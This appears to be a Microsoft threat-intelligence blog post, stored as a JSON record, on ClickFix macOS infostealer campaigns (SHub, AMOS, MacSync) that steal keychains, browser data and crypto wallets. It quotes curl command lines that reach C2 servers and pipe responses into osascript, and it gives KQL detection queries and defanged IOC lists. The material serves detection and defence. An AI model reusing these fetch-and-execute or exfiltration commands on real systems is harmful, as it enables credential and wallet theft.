{“lastseen”:”2026-05-06T16:58:39″,”description”:”Microsoft researchers continue to observe the evolution of an infostealer campaign distributing ClickFix\u2011style instructions and targeting macOS users. In this recent iteration, threat actors attempt to take advantage of users who are looking for helpful advice on macOS-related issues (for example, optimizing their disk space) in blog sites and other user-driven content platforms by hosting their malicious commands in these sites. \\n\\nThese commands, which are purported to install system utilities, load an infostealing malware like Macsync, Shub Stealer, and AMOS into the targets\u2019 devices instead. The malware then collects and exfiltrates data, including media files, iCloud data and Keychain entries, and cryptocurrency wallets. In some campaigns, the malware replaces legitimate cryptocurrency wallet apps with trojanized versions, putting users at an added security risk. \\n\\nPrior iterations of this campaign delivered the infostealers through disk image (_.dmg_) files that required users to manually install an application. This recent activity reflects a shift in tradecraft, where threat actors instruct users to run Terminal commands that leverage native utilities to retrieve remotely hosted content, followed by script\u2011based loader execution. \\n\\nUnlike application bundles opened through Finder\u2014which might be subjected to Gatekeeper verification checks such as code signing and notarization\u2014scripts downloaded and launched directly through Terminal (for example, by using osascript or shell interpreters) don\u2019t undergo the same evaluation. This delivery mechanism enables attackers to initiate malware execution through user\u2011driven command invocation, reducing reliance on traditional application delivery methods and increasing the likelihood of successful execution.\\n\\nIn this blog, we take a look at three campaigns that use this new tradecraft. We also provide mitigation guidance and detection details to help surface this threat.\\n\\n## Activity overview\\n\\n### Initial access\\n\\nStandalone websites were seen hosting pages that included a Base64-encrypted instruction for end users to run. Some sites present this information in multiple languages. As of this writing, these websites that we\u2019ve observed are either already down or have been reported.\\n\\nFigure 1: Landing page of a script campaign (domenpozh[.]net) Figure 2. ClickFix instructions hosted on mac-storage-guide.squarespace[.]com. Figure 3. mac-storage-guide.squarespace[.]com page was seen presenting content in different languages, such as Japanese.\\n\\nIn other instances, content that included instructions leading to malware were observed to be hosted on Craft, a note-taking platform that lets writers and content creators take notes and distribute their content. We\u2019ve observed that pages like _macclean[.]craft[.]me_ were taken down relatively quickly.\\n\\nFigure 4. ClickFix instruction hosted on macclean[.]craft[.]me.\\n\\nThreat actors were also publishing fake troubleshooting posts on the popular blogging site Medium to distribute ClickFix instructions. These posts claim to solve common macOS problems. Blog sites such as _macos-disk-space[.]medium[.]com_ instruct users to \u201cfix\u201d an issue by pasting a command into Terminal. The command then decodes and runs an AppleScript or Bash loader. These blogs were reported and taken down quickly.\\n\\nWe observed three distinct execution paths leveraging different infrastructure. We\u2019re classifying these as a loader install campaign, a script install campaign, and a helper install campaign. In the loader and helper campaigns, we observed that a random seven-digit value (hereinafter referred to as random IDs), was used in data staging, marking the staging folders as \/_tmp\/shub_ \\u003crandom ID\\u003e or\/tmp\/\\u003crandom ID\\u003e._\\n\\nThe underlying goal remains the same in these campaigns: sensitive data collection, persistence, and exfiltration.\\n\\nThe following table summarizes the key differences between the campaigns. We discuss the details of each of these campaigns in the succeeding sections of this blog.\\n\\n**Activity or technique**| **Loader campaign** ** **| **Script campaign**| **Helper campaign** \\n—|—|—|— \\nInitial installation| No file written on disk | No file written on disk| \/tmp\/helper \/tmp\/update \\nCondition to exit execution| Russian keyboard detected | Failure to resolve an active command-and-control (C2) endpoint (all infrastructure checks fail)| Sandbox detected \\nData staging| \/tmp\/shub_\\u003crandom ID\\u003e\/tmp\/out.zip| None| \/tmp\/\\u003crandom ID\\u003e\/tmp\/out.zip \\nPersistence (Plist file created)| ~\/LaunchAgents\/com.google.keystone.agent.plist | ~\/LaunchAgents\/com.\\u003crandom value\\u003e.plist| Library\/LaunchDaemons\/com.finder.helper.plist \\nBot execution| **Payload:** _\/GoogleUpdate_**C2 pattern:** _\\u003c C2 domain \\u003e\/api\/bot\/heartbeat_| Resolves active C2 through hardcoded infrastructure and Telegram fallback **C2 domain:** _https:\/\/t[.]me\/ax03bot_| **Payload:** _\/.agent_**C2 domain:** _hxxp:\/\/45.94.47[.]204\/api\/_ \\nExfiltration| \\u003cC2 domain\\u003e\/api\/debug\/event\\u003cC2 domain\\u003e\/gate\/chunk| \\u003cC2 domain\\u003e\/upload.php| \\u003cC2 domain\\u003e\/contact \\nTrojanized cryptocurrency apps| Trezor Suite.appLedger Wallet.appExodus.app| Not applicable (handled in later loader\/payload stages)| Trezor Suite.appLedger Wallet.app \\n \\n### Loader install campaign\\n\\nSince February 2026, Microsoft researchers have observed a campaign that requests a loader shell from the attacker\u2019s infrastructure using curl once a user copies and runs ClickFix commands using Terminal. It leads to further execution of a second-stage shell script. \\n\\nThis second shell script is a _zsh_ loader that decodes and decompresses an embedded payload using Base64 and Gzip, respectively. It then executes the payload using _eval_.\\n\\nFigure 5: Shell loader.\\n\\nThe next-stage script also functions as a macOS reconnaissance and execution \u2011control loader that first fingerprints the system by collecting the following information:\\n\\n * Keyboard locale\\n * Hostname\\n * Operating system version\\n * External IP address\\n\\n\\n\\nIt then builds and sends a JSON object to an attacker\u2011controlled server containing an event name (_loader_requested_ or _cis_blocked_) along with this telemetry. It also uses the presence of Russian\/CIS keyboard layouts as a deliberate kill switch, reporting a _cis_blocked_ event and stop the execution.\\n\\nFigure 6: Reconnaissance loader with CIS kill switch.\\n\\nIf the system isn\u2019t blocked, the script silently beacons a \u201cloader requested\u201d event and then downloads and executes a remote AppleScript payload directly in memory using osascript.\\n\\nFigure 7: Reconnaissance loader with AppleScript payload delivery.\\n\\n### AppleScript infostealer\\n\\nThis multi-stage macOS AppleScript stealer employs user interaction-based credential capture, conducts broad data collection across browsers, Keychains, messaging applications, wallet artifacts, and user documents, and stages the collected data into a compressed archive for exfiltration to a remote endpoint. The malware further tampers with locally installed applications to intercept sensitive data, establishes persistence through a masqueraded LaunchAgent that mimics legitimate software updates, and maintains remote command execution capabilities by periodically polling a server for instructions, which are executed at runtime.\\n\\n#### Data collection: tmp\/shub_\\u003crandom ID\\u003e staging\\n\\nWe observed that the stealer self-identifies as \u201cSHub Stealer\u201d (it writes the marker SHub into its staging directory). It prompts the target user to enter their password, pretending to install a \\”helper\\” utility. It then validates the entered password using the command _dscl . -authonly \\u003cusername\\u003e_. Upon successful validation, it sends a _password_obtained_ event to its C2 infrastructure.\\n\\nThe malware stages collected data under a _\/tmp\/shub_ \\u003crandom ID\\u003e\/_ folder. The collected data includes:\\n\\n * Browser credentials\\n * Notes\\n * Media files\\n * Telegram data\\n * Cryptocurrency wallets\\n * Keychain entries\\n * iCloud account data\\n\\n\\n\\nThe stealer also collects documents smaller than 2 MB and stages them within a FileGrabber repository located at _\/tmp\/shub_ \\u003crandom ID\\u003e\/FileGrabber\/_.\\n\\nThe targeted file types are:\\n\\n * txt\\n * pdf\\n * docx\\n * wallet\\n * key\\n * keys\\n * doc\\n * jpeg\\n * png\\n * kdbx\\n * rtf\\n * jpg\\n * seed\\n\\n\\n\\nOnce the data collection is complete, data is compressed and exfiltrated. The stealer deletes staging artifacts to reduce forensic evidence.\\n\\n#### Wallet exfiltration and trojanization\\n\\nSubsequently, the stealer probes the system for the presence of any of the following cryptocurrency wallet applications:\\n\\n * Electrum\\n * Coinomi\\n * Exodus\\n * Atomic\\n * Wasabi\\n * Ledger Live\\n * Monero\\n * Bitcoin\\n * Litecoin\\n * DashCore\\n * lectrum_LTC\\n * Electron_Cash\\n * Guarda\\n * Dogecoin\\n * Trezor_Suite\\n * Sparrow\\n\\n\\n\\nWhen it finds any of these applications, it stages their data for exfiltration.\\n\\nThe stealer was also observed replacing legitimate cryptocurrency wallets apps with attacker-controlled or trojanized ones:\\n\\n * _Ledger Wallet.app_ is replaced by _app.zip_ fetched from _\\u003c C2 domain\\u003e\/zxc\/app.zip_\\n * _Trezor suite.app_ is replaced by _apptwo.zip_ fetched from _\\u003c C2 domain\\u003e\/zxc\/apptwo.zip_\\n * _Exodus.app_ is replaced by _appex.zip_ fetched from _\\u003c C2 domain\\u003e\/zxc\/appex.zip_\\n\\n\\n\\nThese trojanized cryptocurrency wallet applications pose a serious risk to their users who might be unaware of the stealthy compromise and continue to use and transact with them.\\n\\nFigure 8. Trojanized apps installation.\\n\\n### Persistence\\n\\nFor persistence, the malware creates an additional script within the newly created _~\/Library\/Application Support\/Google\/GoogleUpdate.app\/Contents\/MacOS\/_ folder.\\n\\nA malicious implant named _GoogleUpdate_ is configured to _RunAtLoad_ disguised as an agent. Microsoft Defender Antivirus detects this implant as Trojan:MacOS\/SuspMalScript.\\n\\nA new property list (plist), _\/Library\/LaunchAgents\/com.google.keystone.agent.plist_ ,is then staged to run this agent.\\n\\nFigure 9. Plist staging.\\n\\nThe executable is then given permission to run with the following command:\\n\\nFigure 10. _GoogleUpdate_ granted permission to run.\\n\\nOnce _com.google.keystone.agent.plist_ loads, it functions as a backdoor-style bot component that registers the infected macOS system with attacker infrastructure at _\\u003c C2 domain\\u003e\/api\/bot\/heartbeat_, uniquely identifies the host using a hardware-derived ID, and periodically beacons system metadata such as hostname, operating system version, and external IP address.\\n\\nThe C2 server can return Base64-encoded instructions, which the script decodes and executes locally and deletes traces, enabling remote command execution on demand. This process creates a persistent remote-control channel, where the attacker could push arbitrary shell code to the infected device at any time.\\n\\nFigure 11. Backdoor style bot with heartbeat driven payload execution.\\n\\n### Script install campaign\\n\\nIn April 2026, Microsoft researchers observed an ongoing campaign that runs a heavily obfuscated infostealer when users run it through Terminal.\\n\\nThe attack begins with a social\u2011engineering instruction containing a Base64\u2011encoded command.\\n\\nWhen decoded, this instruction resolves a one\u2011line shell pipeline that retrieves a remote script, which is then handed off immediately for execution. By encoding the command and streaming its output directly into the shell, the attacker avoids placing a recognizable payload on disk during the initial stage.\\n\\nFigure 12. Payload delivery.\\n\\nThe retrieved _script.sh_ payload is launched directly from the network stream, with no intermediate file written to disk. It\u2019s responsible for establishing persistence and deploying follow-on functionality. It delivers the second-stage Base64 encoded script under a plist staged at _~\/Library\/LaunchAgent\/com. \\u003crandom name\\u003e.plist_.\\n\\nFigure 13. Payload staged into a plist.\\n\\nThe persisted AppleScript is heavily obfuscated in its original form (character ID concatenation). After decoding, the key logic follows:\\n\\nFigure 14. AppleScript stager (decoded).\\n\\nThis AppleScript functions as a C2 discovery and execution orchestrator for a macOS malware campaign. The AppleScript is used as the control layer and standard Unix tools for network interaction and execution. Its first role is C2 discovery. It iterates over a list of potential server identifiers (for example _{0x666[.]info}_), constructs candidate URLs (_http:\/\/ \\u003cvalue\\u003e\/_), and probes them using curl with a realistic Chrome macOS user agent and a benign POST body (_-d \\”check\\”_). This connectivity test is performed through the following command:\\n\\n\/usr\/bin\/curl -s -H \\”\\u003cUser-Agent\\u003e\\” -d \\”check\\” -connect-timeout 5 -max-time 10 \\u003ccandidate_url\\u003e\\n\\nFigure 15. Initial C2 communication.\\n\\nIf none of the hard\u2011coded infrastructure responds successfully, the script falls back to Telegram\u2011based C2 discovery. It fetches a Telegram bot page using _curl -s_ _hxxps:\/\/t[.]me\/ax03bot_ and extracts a hidden server identifier embedded in an HTML _\\u003c span dir=\\”auto\\”\\u003e_ element using _sed_. This lets the attacker rotate C2 infrastructure dynamically.\\n\\nFigure 16. Telegram-based C2 endpoint discovery.\\n\\nOnce a working C2 endpoint is identified, the script moves into execution orchestration. It sends a final POST request to the resolved server containing a transaction ID (_txid_) and module identifier, then immediately pipes the server response into osascript for execution:\\n\\ncurl -s -X POST \\u003cC2_URL\\u003e -H \\”\\u003cUser-Agent\\u003e\\” -d \\”\\u003ctxid\\u003e\\u0026module\\” | osascript\\n\\nThis command enables arbitrary AppleScript execution directly from the server, fully in memory, with no payload written to disk. Output and errors are suppressed, and execution only proceeds if all connectivity checks succeed. Overall, this isn\u2019t a simple downloader but a resilient, infrastructure\u2011aware loader designed to dynamically discover C2 endpoints, evade takedowns, and execute attacker\u2011controlled AppleScript logic on demand.\\n\\nWe observed data exfiltration to the attacker’s infrastructure on a _C2\/upload.php_ endpoint leveraging curl.\\n\\nFigure 17. Exfiltration of archived data.\\n\\n### Helper install campaign (AMOS)\\n\\nStarting at the end of January 2026 , another ClickFix campaign relied on an executable file named _helper_ or _update_ to run. In this campaign, once a user ran the encoded ClickFix instructions, a first-stage script decoded a Base64 payload and then decompressed the payload using Gunzip.\\n\\nFigure 18. First-stage script requested.\\n\\nThe first-stage script led to the retrieval of the second stage-malicious Mach Object (Mach-O) executable into the newly created _\/tmp\/ \\u003cfile name\\u003e_ folder.\\n\\nFigure 19. \/tmp\/helper installation.\\n\\nIn February 2026, this campaign retrieved the payload under a _\/tmp\/update_ folder.\\n\\nFigure 20. \/tmp\/update installation.\\n\\nThis malicious executable file has its extended properties removed and is then given permission to run and launch on the victim\u2019s device.\\n\\n### Virtualization detection\\n\\nThe infection chain begins with an AppleScript based stager that uses array subtraction obfuscation to conceal its strings and commands. This stager performs an anti-analysis gate by invoking _system_profiler_ and inspecting both memory and hardware profiles. Specifically, it searches for common virtualization indicators such as QEMU, VMware, and KVM. In addition to explicit hypervisor vendor strings, the script also checks for a set of generic hardware artifacts commonly observed in virtualized or analysis environments, including:\\n\\n * Chip: Unknown\\n * Intel Core 2\\n * Virtual Machine\\n * VirtualMac\\n\\n\\n\\nIf any of these indicators are present, execution is terminated early, preventing further stages from running.\\n\\n### Data collection and exfiltration\\n\\nLike the loader install campaign, the stealer prompts the user to enter their password. It validates locally whether the entered password is correct using _dscl_ utility.\\n\\nAfter capturing the target user\u2019s password, the malware then focuses on stealing high-value credentials and financial artifacts. It copies macOS Keychain databases, enabling access to stored website passwords, application secrets, and WiFi credentials.\\n\\nIt also collects browser authentication material from Chromium\u2011based browsers, including saved usernames and passwords, session cookies, autofill data, and browser profile state that can be reused for account takeover. In addition, the script targets cryptocurrency wallets, copying data associated with both browser\u2011based and desktop wallets. This includes browser extensions such as MetaMask and Phantom, as well as desktop wallets including Exodus and Electrum.\\n\\n The stealer compresses collected data into a ZIP file \/_tmp.out.zip,_ which is then exfiltrated to a _\\u003c C2 domain\\u003e\/contact\\u003e_ endpoint. The stealer removes staging artifacts to reduce forensic evidence.\\n\\n Figure 21. Archiving and exfiltration of data.\\n\\n#### Wallet exfiltration and trojanization\\n\\nSimilar to the loader campaign, the stealer in the helper also replaces legitimate wallet apps with attackers-controlled ones:\\n\\n * _Ledger Wallet.app_ is replaced by _app.zip_ fetched from \\u003c_C2 domain\\u003e\/zxc.app.zip_.\\n * _Trezor suite.app_ is replaced by _apptwo.zip_ fetched from _\\u003c C2 domain\\u003e\/zxc\/apptwo.zip_\\n\\n\\n\\n### Backdoor deployment and persistence\\n\\nTo maintain long\u2011term access to infected systems, the helper campaign deploys a multi\u2011stage persistence mechanism built around two cooperating components: a primary backdoor binary and a lightweight execution wrapper.\\n\\n#### Download and execution of the backdoor component (.mainhelper)\\n\\nThe persistence chain begins with the download of a second\u2011stage backdoor implant named _.mainhelper_ into the current user\u2019s home directory. As shown in Figure 22, the obfuscated AppleScript issues a network retrieval command that fetches this Mach\u2011O executable from an attacker-controlled endpoint (_\\u003c C2 domain\\u003e\/zxc\/kito_) and writes it as a hidden file under the user profile.\\n\\nFigure 22. Second implant downloaded.\\n\\nOnce it\u2019s given attributes and permissions to run, the _\/.mainhelper_ implant joins the compromised device to a C2 endpoint _hxxp:\/\/45.94.47[.]204\/api\/._ The implant executes tasks from the attacker, providing a remote-control capability to the attacker on the compromised system.\\n\\nFigure 23. C2 instance.\\n\\n#### Creation of the execution wrapper (.agent)\\n\\nIn addition to the backdoor binary, the stealer creates a secondary file named _.agent,_ also placed in the user\u2019s home directory. Unlike _.mainhelper_ , _.agent_ isn\u2019t a full implant. Instead, it is a lightweight shell wrapper whose sole purpose is to launch and supervise the _.mainhelper_ process. The script writes the wrapper to disk and configures it so that, if the backdoor process terminates or crashes, _.agent_ relaunches it.\\n\\n#### LaunchDaemon installation (com.finder.helper.plist)\\n\\nAfter prompting the victim for their macOS password and validating it, the script escalates privileges to establish system-level persistence. It constructs a _LaunchDaemon_ plist, stages the XML content to a temporary file (_\/tmp\/starter_), and then writes it to _\/Library\/LaunchDaemons\/com.finder.helper.plist_.\\n\\n#### LaunchDaemon plist staging and loading\\n\\n_LaunchDaemon_ is configured to run _\/bin\/bash_ with the path to _~\/.agent_ as its argument, rather than invoking the backdoor binary directly. As shown in Figure 25, the script sets correct ownership, loads the daemon using _launchctl_ , and enables both RunAtLoad and KeepAlive.\\n\\nFigure 24. Plist staging.\\n\\nAs a result, on every system boot,_launchd_ runs the _.agent_ wrapper with root privileges, which in turn ensures that the _.mainhelper_ backdoor process is running.\\n\\nFigure 25. Plist loading.\\n\\n## Mitigation and protection guidance\\n\\nApple Xprotect has updated signatures to protect users against this threat. Additionally, in macOS 26.4 and later, Apple has introduced a mitigation that directly addresses the ClickFix delivery mechanism. \\n\\n* * *\\n\\nWhen a user attempts to paste a potentially malicious command into Terminal, they will now see the following prompt:\\n\\nPossible malware, Paste blocked\\n\\nYour Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy. These instructions are commonly offered via websites, chat agents, apps, files, or a phone call.\\n\\n* * *\\n\\nOrganizations can also follow these recommendations to mitigate threats associated with this threat:\\n\\n * **Educate users.** Warn them against running instructions from untrusted sources.\\n * **Monitor Terminal usage.** Alert on suspicious Terminal or shell sessions spawned by installers or user apps.\\n * **Detect native tool abuse.** Flag unusual sequences of macOS utilities (curl, Base64, Gunzip, osascript, and dscl).\\n * **Inspect outbound downloads.** Monitor curl activity fetching encoded or compressed payloads from unknown domains.\\n * **Protect credential stores.** Detect unauthorized access to keychain items, browser data, SSH keys, and cloud credentials.\\n * **Monitor data staging.** Alert on archive creation of sensitive artifacts followed by HTTP POST exfiltration.\\n * **Enable endpoint protection.** Ensure macOS endpoint detection and response (EDR) or extended detection and response (XDR) monitors script execution and living\u2011off\u2011the\u2011land behavior.\\n * **Restrict C2 traffic.** Block outbound connections to suspicious or newly registered domains.\\n\\n\\n\\nMicrosoft also recommends the following mitigations to reduce the impact of this threat.\\n\\n * Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.\\n * Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\\n * Allow investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\\n * Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to mitigate attackers from using local administrator privileges to set antivirus exclusions.\\n\\n\\n\\n# Microsoft Defender detections\\n\\nMicrosoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.\\n\\nCustomers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.\\n\\n**Tactic**| **Observed activity**| **Microsoft Defender coverage** \\n—|—|— \\nExecution| User copies, pastes, and runs Base64 instructions Base64 instructions are deobfuscated Executable files are created from remote attacker\u2019s infrastructureInstalled malware implant is executed Malicious AppleScript is retrieved from attacker infrastructureSequence of malicious instructions are executed| **Microsoft Defender for Endpoint** \\nSuspicious shell command execution \\nObfuscation or deobfuscation activity \\nExecutable permission added to file or directory \\nSuspicious launchctl tool activity \\n’SuspMalScript’ malware was prevented \\nPossible AMOS stealer Activity Suspicious AppleScript activity \\nSuspicious piped command launched \\nSuspicious file or information obfuscation detected \\n \\n**Microsoft Defender Antivirus** Trojan:MacOS\/Multiverze \u2013 Created executable file \\nTrojan:MacOS\/SuspMalScript \u2013 Malware implant downloaded by the loader campaign \\nBehavior:MacOS\/SuspAmosExecution \u2013 Malicious file execution \\nBehavior:MacOS\/SuspOsascriptExec \u2013 Malicious osascript execution \\nBehavior:MacOS\/SuspDownloadFileExec \u2013 Suspicious file download and execution \\nBehavior:MacOS\/SuspiciousActiviyGen \\nData collection| Malware collects data from bash history, browser credentials, and other sensitive foldersMultiple files are collected into staging foldersCollected data is staged and archived into a folder Staging folders are removed| **Microsoft Defender for Endpoint** \\nSuspicious access of sensitive filesSuspicious process collected data from local systemEnumeration of files with sensitive dataSuspicious archive creationSuspicious path deletion \\n \\n**Microsoft Defender Antivirus** Behavior:MacOS\/SuspPassSteal \u2013 Suspicious process collected data from local systemTrojan:MacOS\/SuspDecodeExec \u2013 Malicious plist detection \\nDefense evasion| Malware deletes the staging paths following exfiltrationExecution of obfuscated code to evade inspection | **Microsoft Defender for Endpoint** Suspicious path deletionSuspicious file or information obfuscation detected \\nCredential access| Malware steals user account credential and stages files for exfiltration| **Microsoft Defender for Endpoint** Suspicious access of sensitive filesUnix credentials were illegitimately accessed \\nExfiltration| Malware exfiltrates staged data using curl and HTTP POST| **Microsoft Defender for Endpoint** Possible data exfiltration using curl \\n \\n**Microsoft Defender Antivirus** Behavior:MacOS\/SuspInfoExfilTrojan:MacOS\/SuspMacSyncExfil \\n \\n### Threat intelligence reports\\n\\nMicrosoft Defender customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to help prevent, mitigate, or respond to associated threats found in customer environments.\\n\\n### Microsoft Defender threat analytics\\n\\nFrom ClickFix to code signed: the quiet shift of MacSync Stealer malware.\\n\\nMicrosoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.\\n\\n## Hunting queries\\n\\n### Microsoft Defender\\n\\nMicrosoft Defender customers can run the following queries to find related activity in their networks:\\n\\n**Initial access******\\n \\n \\n \/\/Loader campaign installation\\n DeviceNetworkEvents\\n | where InitiatingProcessCommandLine has_any (\\”loader.sh?build=\\”,\\”payload.applescript?build=\\”)\\n \\n \/\/ Helper campaign installation\\n DeviceFileEvents\\n | where InitiatingProcessCommandLine has_all(\\”curl\\”, \\”\/tmp\/helper\\”,\\”-o\\”)\\n \\n \/\/Install of \/update install campaign\\n DeviceFileEvents\\n | where InitiatingProcessCommandLine has_all(\\”curl\\”, \\”\/tmp\/update\\”,\\”-o\\”)\\n | where FileName== \\”update\\”\\n \\n\\n**Exfiltration to C2 infrastructure**\\n \\n \\n \/\/loader campaign\\n \\n DeviceProcessEvents\\n | where ProcessCommandLine has_all(\\”curl\\”, \\”post\\”,\\”\/debug\/event\\”, \\”build_hash\\”)\\n \\n DeviceProcessEvents\\n | where ProcessCommandLine has_all(\\”curl\\”,\\”\/tmp\\”,\\”post\\”,\\”-H\\”,\\”-f\\”,\\”build\\”,\\”\/gate\\”)\\n | where not (ProcessCommandLine has_any(\\”.claude\/shell-snapshots\\”)) \\n \\n \/\/script campaign \\n \\n DeviceNetworkEvents\\n | where InitiatingProcessCommandLine has_all (\\”curl\\”,\\”-F\\”,\\”txid\\”,\\”zip\\”,\\”max-time\\”)\\n \\n \/\/helper campaign\\n DeviceProcessEvents\\n | where InitiatingProcessCommandLine has_all (\\”curl\\”,\\”post\\”,\\”-H\\”,\\”user\\”,\\”buildid\\”,\\”cl\\”,\\”cn\\”,\\”\/tmp\/\\”)\\n \\n\\n**Bot****C2 installation and communication**\\n \\n \\n \/\/loader campaign – bot install\\n DeviceFileEvents\\n | where InitiatingProcessCommandLine ==\\”base64 -d\\”\\n | where FolderPath endswith @\\”Library\/Application Support\/Google\/GoogleUpdate.app\/Contents\/MacOS\/GoogleUpdate\\”\\n \\n \/\/loader campaign \u2013 bot communication\\n DeviceProcessEvents\\n | where ProcessCommandLine has_all(\\”\/api\/bot\/heartbeat\\”,\\”post\\”,\\”curl\\”)\\n \\n \/\/script campaign second stage execution \\n DeviceProcessEvents\\n | where ProcessCommandLine has_all(\\”curl\\”,\\”POST\\”,\\”txid\\”,\\”osascript\\”,\\”bmodule\\”,\\”max-time\\”)\\n \\n \/\/helper campaign – bot install \\n \\n \/\/Alternate query for helper or bot update installation\\n DeviceFileEvents\\n | where InitiatingProcessCommandLine has_all (\\”curl\\”,\\”zxc\\”,\\”kito\\”)\\n \\n DeviceProcessEvents\\n | where InitiatingProcessFileName ==\\”osascript\\”\\n | where ProcessCommandLine has_all (\\”sh\\”,\\”echo\\”,\\”-c\\”, \\”cp\\”,\\”\/tmp\/starter\\”,\\”.plist\\”)\\n \\n\\n## Indicators of compromise\\n\\n### Domains distributing ClickFix\\n\\n**Indicator**| **Type**| **Description** \\n—|—|— \\ncleanmymacos[.]org| Domain| Distribution of ClickFix instructions \\nmac-storage-guide.squarespace[.]com| Domain| Distribution of ClickFix instructions \\nclaudecodedoc[.]squarespace[.]com| Domain| Distribution of ClickFix instructions \\ndomenpozh[.]net| Domain| Distribution of ClickFix instructions \\nmacos-disk-space[.]medium[.]com| Domain| Distribution of ClickFix instructions \\nmacclean[.]craft[.]me| Domain | Distribution of ClickFix instructions \\napple-mac-fix-hidden[.]medium[.]com| Domain| Distribution of ClickFix instructions \\n \\n### Loader campaign\\n\\n**Indicator**| **Type**| **Description** \\n—|—|— \\nrapidfilevault4[.]sbs| Domain| Payload delivery and C2 \\ncoco-fun2[.]com| Domain| Payload delivery and C2 \\nnitlebuf[.]com| Domain| Payload delivery and C2 \\nyablochnisok[.]com| Domain| Payload delivery and C2 \\nmentaorb[.]com| Domain| Payload delivery and C2 \\nseagalnssteavens[.]com| Domain| Payload delivery and C2 \\nres2erch-sl0ut[.]com| Domain| Payload delivery and C2 \\nfilefastdata[.]com| Domain| Payload delivery and C2 \\nmetramon[.]com| Domain| Payload delivery and C2 \\noctopixeldate[.]com| Domain| Payload delivery and C2 \\npewweepor092[.]com| Domain| Payload delivery and C2 \\nbulletproofdomai2n[.]com| Domain| Payload delivery and C2 \\nbenefasts-fhgs2[.]com| Domain| Payload delivery and C2 \\nrepqoow77wiqi[.]com| Domain| Payload delivery and C2 \\ndo2wers[.]com| Domain| Payload delivery and C2 \\nrapidfilevault4[.]cyou| Domain| Payload delivery and C2 \\nreews09weersus[.]com| Domain| Payload delivery and C2 \\npepepupuchek13[.]com| Domain| Payload delivery and C2 \\npewqpeee888[.]com| Domain| Payload delivery and C2 \\nwewannaliveinpicede[.]com| Domain| Payload delivery and C2 \\ndatasphere[.]us[.]com| Domain| Payload delivery and C2 \\nrapidfilevault5[.]sbs| Domain| Payload delivery and C2 \\ncoco2-hram[.]com| Domain| Payload delivery and C2 \\npoeooeowwo777[.]com| Domain| Payload delivery and C2 \\nkorovkamu[.]com| Domain| Payload delivery and C2 \\nmetrikcs[.]com| Domain| Payload delivery and C2 \\nmetlafounder[.]com| Domain| Payload delivery and C2 \\nterafolt[.]com| Domain| Payload delivery and C2 \\nhaploadpin[.]com| Domain| Payload delivery and C2 \\nrawmrk[.]com| Domain| Payload delivery and C2 \\nmikulatur[.]com| Domain| Payload delivery and C2 \\nmilbiorb[.]com| Domain| Payload delivery and C2 \\ndoqeers[.]com| Domain| Payload delivery and C2 \\nwe2luck[.]com| Domain| Payload delivery and C2 \\nquantumdataserver5[.]homes| Domain| Payload delivery and C2 \\nbintail[.]com| Domain| Payload delivery and C2 \\nmolokotarelka[.]com| Domain| Payload delivery and C2 \\ntrehlub[.]com| Domain| Payload delivery and C2 \\navafex[.]com| Domain| Payload delivery and C2 \\nrhymbil[.]com| Domain| Payload delivery and C2 \\nboso6ka[.]com| Domain| Payload delivery and C2 \\nres2erch-sl2ut[.]com| Domain| Payload delivery and C2 \\npilautfile[.]com| Domain| Payload delivery and C2 \\nbigbossbro777[.]com| Domain| Payload delivery and C2 \\nmiappl[.]com| Domain| Payload delivery and C2 \\npeloetwq71[.]com| Domain| Payload delivery and C2 \\nfastfilenext[.]com| Domain| Payload delivery and C2 \\nberansraol[.]com| Domain| Payload delivery and C2 \\npelorso90la[.]com| Domain| Payload delivery and C2 \\nmedoviypirog[.]com| Domain| Payload delivery and C2 \\nwewannaliveinpice[.]com| Domain| Payload delivery and C2 \\nmalkim[.]com| Domain| Payload delivery and C2 \\npipipoopochek6[.]com| Domain| Payload delivery and C2 \\nhello-brothers777[.]com| Domain| Payload delivery and C2 \\ndialerformac[.]com| Domain| Payload delivery and C2 \\npersaniusdimonica8[.]com| Domain| Payload delivery and C2 \\nhilofet[.]com| Domain| Payload delivery and C2 \\ntmcnex[.]com| Domain| Payload delivery and C2 \\nnibelined[.]com| Domain| Payload delivery and C2 \\npissispissman[.]com| Domain| Payload delivery and C2 \\nbankafolder[.]com| Domain| Payload delivery and C2 \\nperewoisbb0[.]com| Domain| Payload delivery and C2 \\nus41web[.]live| Domain| Payload delivery and C2 \\nuk176video[.]live| Domain| Payload delivery and C2 \\njihiz[.]com| Domain| Payload delivery and C2 \\nbeltoxer[.]com| Domain| Payload delivery and C2 \\nswift-sh[.]com| Domain| Payload delivery and C2 \\nhitkrul[.]com| Domain| Payload delivery and C2 \\nkofeynayagush[.]com \\n \\n| Domain| Payload delivery and C2 \\n \\n### Script campaign\\n\\n**Indicator**| **Type**| **Description** \\n—|—|— \\nhxxps:\/\/cauterizespray[.]icu\/script[.]sh \\n \\n| URL| Payload delivery \\nhxxps:\/\/enslaveculprit[.]digital\/script[.]sh \\n \\n| URL| Payload delivery \\nhxxps:\/\/resilientlimb[.]icu\/script[.]sh \\n \\n| URL| Payload delivery \\nhxxps:\/\/thickentributary[.]digital\/script[.]sh | URL| Payload delivery \\nhxxp:\/\/paralegalmustang[.]icu\/script[.]sh| URL | Payload delivery \\nhxxps:\/\/round5on[.]digital\/script[.]sh | URL| Payload delivery \\nhxxps:\/\/qjywvkbl[.]degassing-mould[.]digital \\n \\n| URL| Payload delivery \\nhxxps:\/\/zg5mkr7q[.]apexharvestor[.]digital \\n \\n| URL| Payload delivery 